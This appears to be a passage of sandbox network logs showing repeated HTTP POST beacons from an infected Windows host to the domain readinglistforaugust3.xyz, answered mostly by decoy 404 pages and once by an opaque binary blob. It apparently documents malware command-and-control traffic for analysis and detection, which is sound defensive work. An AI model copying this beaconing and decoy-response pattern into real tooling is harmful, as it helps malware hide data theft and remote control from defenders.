Aug 24, 2021 08:49:14.983452082 CEST	2575	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 00 00 a6 97 8c b4 08 02 7f 77 08 a7 e7 cb 2c c9 aa 43 96 74 c4 0c 23 20 5b f4 75 62 d6 86 a7 f2 12 bc a9 da 62 b6 a0 d6 8e 2a 03 c1 fe f5 78 80 42 09 22 23 7a 2b 5a be 51 83 37 f3 38 8f 9d dd 37 2e 52 8c 23 e2 54 03 2c 1e 64 de 43 81 bc a4 b9 18 d8 e0 a3 e5 f9 b6 3f 7c 68 a0 d4 a1 a7 43 ab 78 a6 8f 31 88 43 72 56 b9 f9 4f 85 d1 73 62 c6 80 7d 19 09 03 aa d1 5f fb 83 4a 56 48 b2 50 68 63 2b 5a da 57 ce 9f 1c d0 10 2e a9 55 72 08 60 11 68 cb a8 fe 10 e5 0f 28 c9 da bf ee 57 83 77 ae 39 18 04 fc fd f4 33 e2 4a 0e ce 50 f6 f8 c0 4b 7b b8 0e 1d fb 4f 6e 1b 6d b8 47 3d 8c d1 ca 19 c6 79 d3 d4 52 e4 74 1d 25 17 52 23 71 c8 45 e5 b9 a2 92 4a 2d 2e f8 eb 2f b2 87 2e f9 bc 46 34 d3 71 7b 27 7c 66 1f bd 15 2f 01 bc 50 57 9a 0e 3a 54 e9 43 72 e4 67 22 6f 76 49 57 91 b4 30 2f b5 14 98 92 cd b8 04 64 6f 1c a3 56 22 d0 73 6d f1 b5 56 ce 08 cd b7 dd 52 00 bf 3d 1f ca e6 c6 c3 09 b2 86 a4 a3 15 4d b4 77 12 ff a0 c1 94 52 07 0a 22 ad 15 23 78 3a 41 86 7e c6 53 e5 0d 3b 27 32 53 c6 48 e8 87 a9 b2 c7 8e 43 b7 bf 83 97 e1 1b d3 98 ee 36 5f 10 62 66 52 ef 2d 4c 31 5a 63 51 57 9f 00 c5 0d 60 4f 1f e4 69 fb ea 32 78 1d 2d ce d5 02 04 e7 14 82 8d a9 6b e5 3c 7a 54 19 51 5e 36 06 06 50 da 50 86 01 8e 25 cf a8 65 17 92 54 67 f4 c1 ed fe 25 0d 1e 5d ca e8 07 5d 0d a8 00 da 5b 36 a1 7f a5 65 67 c8 b6 3d e8 67 b7 ed 21 4d f3 8b b7 e9 ab 7c 93 23 04 16 be a3 a6 65 79 cc 66 56 7a 79 2a fc d6 03 42 06 2a e5 8f cb e7 66 93 78 b5 03 f1 a1 48 6a 0d aa 22 49 f8 e3 27 99 a3 b0 cd 1b 38 8c 81 89 42 e9 02 25 3c d8 23 bc b6 b5 b5 2e 5d fb ed 40 0b 16 18 08 9d 71 03 aa 0f ef 72 b2 98 4f 26 15 96 c8 13 df f9 64 af 46 10 ec d9 fb 46 95 27 a3 df 67 50 77 5e c0 62 74 f1 3a 39 02 79 8f 95 3a 50 1f 21 3b ab 63 b5 26 b5 9c 99 b1 20 0b 06 73 38 d0 5c 93 7b 4a 51 69 79 13 99 ea 3a c7 da 53 0f b7 4a 47 14 2c 46 d1 82 db 68 ff 24 35 e5 63 73 cf 98 b9 63 60 f2 b6 fc e0 7c 56 2b 83 ae c3 12 48 1d 47 ea 0e bf 8e ac 59 4a bb 22 6d c1 df e4 bd be 75 2f d3 b2 cc 9f f9 5b aa cf 25 51 57 30 b6 4c 72 1c 79 df d8 65 7f 63 99 42 eb 31 74 7c 8e 28 c0 49 d1 2a 0c df 0f d3 99 23 9a 7f 4e 0c 96 26 c1 04 f3 87 57 07 c3 09 e8 6d 86 18 33 cc 89 4b 9b 66 94 ef ec d6 37 95 ec 44 41 f5 7f 60 36 04 ba ff 27 83 54 24 f8 e5 cc 7a 5a 0f 61 a0 63 89 b3 0c 28 51 b9 f6 12 63 8a 91 b3 1f a2 4e 37 ab d7 a8 05 3a 8b 62 44 85 d5 79 e1 34 75 2f 5b 9b e3 c1 78 f2 c8 79 8e 6b 4e d2 1d ef 0b d6 39 e1 fb 37 e1 7e 58 07 e0 f0 b4 2d 91 6c 38 8b 0d ad 0f 45 84 ac f1 cc e6 60 81 fe 0c 56 0c c1 60 e7 ab 64 47 d3 e3 71 0d b2 19 1f b7 1c 9a 71 41 2a 27 6f e8 ee 65 44 50 7f c8 f1 9d e8 b4 7f 5d 7e 8e b6 58 c4 f6 2d c9 24 c0 0f 0d e9 41 67 f3 66 56 a3 44 d1 c4 a3 85 4b e7 cb 8a 6c 61 29 78 d5 a2 1e 97 94 13 5a 93 db 14 d8 53 d4 25 4b f7 d5 84 e3 56 40 28 66 00 32 25 d4 a1 d4 da d5 e9 25 7b d4 ea 6e 30 da 17 e8 b4 31 e9 32 95 23 09 72 74 1e 97 85 ce bf 87 9d 85 9d ca 27 a9 da 4e 81 23 e6 0f ac 86 cd 87 3b fe e1 39 be 29 cb 6b 8d d3 13 ac ed 9a e3 cf 59 ad 37 fc 83 b0 bc af 0c b6 40 bc 36 85 ac 3d eb 95 d9 ac d0 90 bb ec b0 70 02 81 8c 28 3c d6 ef ff e6 84 27 ed 5c 88 3b c2 00 67 95 39 1c cb dc 34 29 98 ab d6 f1 57 2a 46 c2 26 60 31 2a a2 35 44 9e 74 6d 75 c2 f0 ef 7d f4 59 bc 1b 80 52 c2 27 84 ce 1c f0 ec e6 23 99 55 98 b1 18 04 46 a0 d5 f1 d4 b6 a1 1c 29 5f 35 ba 93 96 9f 5c 20 47 63 f2 1d 60 a7 40 92 ae 0a b2 4a 22 15 cf 89 6d c1 ad 86 39 5d 3e 36 3e e4 02 a7 fd 2f 44 99 dd 1d de Data Ascii: 3ff66w,Ct# [ubbxB"#z+ZQ787.R#T,dC?\|hCx1CrVOsb}_JVHPhc+ZW.Ur`h(Ww93JPK{OnmG=yRt%R#qEJ-./.F4q{'\|f/PW:TCrg"ovIW0/doV"smVR=MwR"#x:A~S;'2SHC6_bfR-L1ZcQW`Oi2x-k<zTQ^6PP%eTg%]][6eg=g!M\|#eyfVzyBfxHj"I'8B%<#.]@qrO&dFF'gPw^bt:9y:P!;c& s8\{JQiy:SJG,Fh$5csc`\|V+HGYJ"mu/[%QW0LryecB1t\|(I#N&Wm3Kf7DA`6'T$zZac(QcN7:bDy4u/[xykN97~X-l8E`V`dGqqA'oeDP]~X-$AgfVDKla)xZS%KV@(f2%%{n012#rt'N#;9)kY7@6=p(<'\;g94)WF&`1*5Dtmu}YR'#UF)_5\ Gc`@J"m9]>6>/D
Aug 24, 2021 08:49:16.157567024 CEST	3227	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.207091093 CEST	3228	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.237241983 CEST	3228	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 154 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.284636021 CEST	3228	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=3
Aug 24, 2021 08:49:16.298228025 CEST	3229	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.347091913 CEST	3230	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.418983936 CEST	3231	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 244 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.472234011 CEST	3232	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.484957933 CEST	3232	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 290 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.536012888 CEST	3233	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.620024920 CEST	3234	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 171 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.671252966 CEST	3235	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.700203896 CEST	3235	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.748431921 CEST	3253	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.789232016 CEST	3253	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.835613966 CEST	3254	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.846986055 CEST	3255	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.893894911 CEST	3256	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 